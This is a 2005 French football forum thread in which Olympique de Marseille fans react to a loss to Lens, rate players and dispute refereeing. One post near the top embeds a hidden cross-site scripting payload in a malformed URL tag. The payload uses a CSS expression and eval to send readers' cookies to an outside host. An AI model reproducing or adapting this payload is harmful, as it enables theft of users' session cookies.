Actualité, matchs, Olympique de Marseille, Ligue 1, championnats étrangers et football en général, c'est ici que ça se passe !
Règles du forum
Répondre

06 Aoû 2005, 18:36

goku, Boudoum93, même s'il siffle sur oruma, celui ci reste en dehors de la surface, donc pas de penalty, mais bon, j'suis pas sur que ca mérite qu'on s'étale plus la dessus :wink:

06 Aoû 2005, 18:37

goku a écrit:Sur le penalty aussi, c'est inadmissible, qu'a ce niveau, aucun marseillais ne se bouge le cul pour récupérer le ballon aprés l'arret de Carasso... Quand je vois Luyindula et Taiwo mains sur les Hanches a l'entrée de la surface, ça me donne envie de gerber!

3 Lensois arrivent direct sur Carasso des qu'il la repousse :roll:

ca aussi ca me dépasse

Carasso : RAS
Ferreira : Moyen, mais c'est sa valeur. Ne joue que parce qu'on n'a personne d'autre.
Beye : Karateka man, bon quand il a Dehu pour le conseiller sur son placement. Sans Fred #-o . N'a pas l'âme d'un mec qui rassure en défense.
Meité : Capitaine courage et c'est tout...
Nakata : Je vois pas pourquoi Fernandez ne l'a pas fait jouer dans le couloir, en inversant à Taiwo. Léger en stoppeur mais pas plus nul que les autres.
Taiwo : Une bonne frappe mais assez inconstant dans le placement.
Lamouchi : POur moi, son meilleur match à l'OM. Même s'il reste très loin de sa valeur.
Oruma : N'avait pas récupéré de mercredi, bien pris par le milieu lensois.
Koke : Ah bon, il a joué?
Lutindula : Ah bon bon, il a joué? (bis) Sans déconner, dès que Mendoza a joué en 9, PL a été un peu meilleur. Donc Fernandez est aussi responsable de spon petot match. Il traine sa peine sur le dos, il est perdu, plus de confiance.
Mendoza : Intéressant, pas mal en pivot devant, on sent qu'il peut être dangereux à tout moment, même s'il manque encore de condition physique.

Bref, un OM digne d'un 10-12e de L1, privé de 3 joueurs majeurs... A la 4e journée, on aura entre 0 et 3 points, on se promet un automne pénible et une saison à se faire chier car les leaders auront déjà pris le large, la presse nous sera tombée dessus, Sars sera toujours là et Baldé fera rigoler pour ses pieds carrés.

Euh, il est où le four que je mette la tête dedans?

beUbeU a totalement raison. Franchement y'a bien faute sur dindane, ne seraut-ce que caraso qui le fait béton.
Sars a mal arbitré, mais un peu de maturoté bon sang, on a été nullissime à en perdre l'amour du foot, point barre.

06 Aoû 2005, 18:38

il y a clairement un pb de motivation dans cette équipe... Parce que le talent est là (même si ce soir il manquait du monde, et pas des moindres), il y a du potentiel dans cette équipe! Et là je pense que Fernandez est fautif....
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://hotmail7.free.fr/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'

06 Aoû 2005, 18:38

Boudoum93 a écrit:
goku a écrit:Sur le penalty aussi, c'est inadmissible, qu'a ce niveau, aucun marseillais ne se bouge le cul pour récupérer le ballon aprés l'arret de Carasso... Quand je vois Luyindula et Taiwo mains sur les Hanches a l'entrée de la surface, ça me donne envie de gerber!

3 Lensois arrivent direct sur Carasso des qu'il la repousse :roll:

ca aussi ca me dépasse

c tres rageant en effet!

06 Aoû 2005, 18:40

Vous avez vu la tete de Nakata juste avant qu'il soit remplacé.
On dirait qu'il attendait que ca :shock:

C'est l'héritage Troussier.

On va pas trop cracher dans la soupe il nous a amené Taiwo aussi.

Et Koke je sais pas ce qu'il fait la,il est totalement inconnu en Espagne vu qu'il jouait avec l'équipe B de Malaga.Donc si on va chercher nos joueurs dans les équipes réserves des clubs de seconde moitié du championnat espagnole c normal.
Enfin Nantes c'est fait prété un joueur de l'équipe B du dernier du championnat de France.Et ouais les gars on est lanterne rouge c'est grave #-o

06 Aoû 2005, 18:41

Citation:
-Nakata: Une étoile en plus , qui n'a pas était plus ridicule que ses comperes...

-Taiwo: 1 ou 2 étoiles en moins, beaucoup de pertes, court défensivement...

-Lamouchi, une étoile en moins... Deux passes réussis dans le match, et un nombre incalculables de ballons perdus...

je suis d accord avec cette proposition!

je sui aussi d'accord taiwo n'a pas ete si bon que sa surtout offensivement

06 Aoû 2005, 18:43

leland29 a écrit:
Et Koke je sais pas ce qu'il fait la,il est totalement inconnu en Espagne vu qu'il jouait avec l'équipe B de Malaga.Donc si on va chercher nos joueurs dans les équipes réserves des clubs de seconde moitié du championnat espagnole c normal.

#-o Le rapport?

06 Aoû 2005, 18:50

leland29 a écrit:Vous avez vu la tete de Nakata juste avant qu'il soit remplacé.
On dirait qu'il attendait que ca :shock:

C'est l'héritage Troussier.

On va pas trop cracher dans la soupe il nous a amené Taiwo aussi.

Enfin Nantes c'est fait prété un joueur de l'équipe B du dernier du championnat de France.Et ouais les gars on est lanterne rouge c'est grave #-o

sisi koke est connu en espagne lol...j ai croisé hier quelqu un qui m a parlé de lui...

06 Aoû 2005, 18:51

j'ai été gardien et je peux vous dire que ya pas faute de carrasso.
c'est tres tres frustrant quand t'es goal que tu sens le mec qui tape dans toi (dans le bras, dans la main, sur ton corps) et tombe apres, t'as envie de te relever direct et de lui mettre un pain.
Sars le sait et si ca avait été dans l'autre sens il lui aurait foutu un jaune a l'attaquant.
En plus apres on nous raconte le truc bidon comme quoi c'est la faute de meité qu'il siffle... mais si meité l'avait vraiment fait cette faute dindane serait tombédans l'autre direction BREF!!! pas péno pour moi

mais la défaite me dépasse, comment on fait pour etre super bon un jour et nul a chier 3 jours apres, je comprends pas. vraiment ça me dépasse. Tout comme on sentait bien pendant le match que à partir du moment ou on prend un but le match est fini. Ca me dépasse.

06 Aoû 2005, 18:53

et Fernandez ? Pourquoi n'a t-il pas été noté ? Il a étré aussi nul que contre Bordeaux... il mérite 1 étoille... pour sa présence sur le banc.

06 Aoû 2005, 19:09

faut avouer que Nakata est tjs aligné ds les pires condition...
cette fois ca aura été un 1er match ds une defense a 5 contre Lens =D>
il mérite une etoile de plus pour sa prestation pas pire que les autres et pour la facon dont il est utilsé...

pour Koke et PL c'est pas facile non plus
ils meritent pas la moyenne mais ils sont alignés a chaque fois que le gpe est diminué, avec tres peu de ballons a negocier pour eux... ils font ce qu'ils peuvent.
suffit de voir la difference entre Mendoza contre la Lazio et ce soir ds cette equipe...

je trouve la defense un peu plus sereine qu'avant
elle a encore fait une grosse faute de marquage sur CF, mais elle n'a pas été aux abois.
cependant Beye me venere a conceder des CF souvent tres mal placés.
Taiwo a beau etre impressionnant physiquement et offensivement, il n'est vraiment pas terrible defensivement.

comme lecon, on peut retenir la meme que contre Bdx: pour l'instant l'OM n'a pas de banc pour jouer 2 competitions a la fois.
ca ira peut etre mieux avec le retour de suspension de Niang et la montée en puissance de gars comme Mendoza et Lamouchi

06 Aoû 2005, 19:17

Jsuis pas tellement d'accord avec ceux qui trouvent Taiwo pas terrible defensivement, AMHA, il se fait vraiment pas facilement déborder ni bouger!
A noter aussi que Olembé, pendant 5 minutes j'etais content de le voir sur le terrain en me disant que quand il a qq un derriere lui ENFIN il se décide a jouer vers l'avant, et la c'était pas mal.
Et apres on a pris un but et il a recommencé a faire de la merde (passes en retrait, passes ratées..)

ENin bon, il faut vraiment s'attednre a un mois d'aout catastrophique au plan comptable, on va recevoir Lyon donc c'est pas gagné (a ce rythme la on perd) puis on va a Rennes (tres bon a domicile). DOnc a ce rythme la, faudrait pas s'étonner d'avoir 0 points en 4 matchs... ça ne voudrait pas non plus dire qu'on est foutus! on mange notre pain noir.

Esperons qu'il reste encore des tetes non coupées à ce moment la.

06 Aoû 2005, 19:26

Faut arrêter un peu, Sars en dessous il avait un maillot Lensois, c'est pas possible autrement!
Dindane simule, y a pas pénalty, après, il tombe seul face à Nakata, et là carton sur Nakata....
Ensuite, Demont avec un jaune fait une énorme faute, en principe c'était rouge et il dit rien!
Pareil sur Thomert, qui expédie le ballon d'un geste de colère sans prendre de carton....
Sur la main, Demont fait main c'est incontestable, et il me semble bien que c'est la main qui va au ballon, donc pénalty.
Ensuite, la faute sur Oruma, elle est à l'éxtérieur, donc coup-franc, mais c'est le dernier défenseur qui fait la faute! C'est donc un rouge qu'il fallait sortit!

Alors, certes, l'OM n'a pas montré un beau visage, mais Carasso n'a pas été trop mis à contribution pendant le match!

06 Aoû 2005, 19:27

Jsuis pas tellement d'accord avec ceux qui trouvent Taiwo pas terrible defensivement, AMHA, il se fait vraiment pas facilement déborder ni bouger!

si ne fallait que ca pour etre un bon defenseur...
l'importance du placement tu connais?

surtout qu'en jouant en vrai lateral, la qualité de placement doit etre tres importante

06 Aoû 2005, 19:28

oui c est a cause de l intertoto , la fatigue c est cela , encore un match pitoyable , une seul occasion

lanterne rouge bravo

quelle équipe nakata , luyindula , lamouchi il devrait prendre sa retraite

sans renfort je vous promet la l 2

j ai honte de supporter l om

lens joue aussi l intertoto mais quelle belle équipe ,

on n a notre zizou battles

fernandez c est lippi c est cela?

A CEUX QUI ONT VU LE MATCH objectivement notre équipe est bidon

06 Aoû 2005, 19:32

meité me dégoute de match en match 8)

06 Aoû 2005, 19:34

nigerien =>Niger
nigerian=>Nigeria

06 Aoû 2005, 19:35

A CEUX QUI ONT VU LE MATCH objectivement notre équipe est bidon

ouais ouais...
Lens n'a pas été meilleur

Fernandez a voulu jouer la defense
d'abord a cause des absents, ensuite pour que le schema a 5 se rode

l'OM n'a pas de banc pour mieux faire, mais on a encore vu des phases de jeu encourageant et une defense qui fait moins peur qu'avant...
Répondre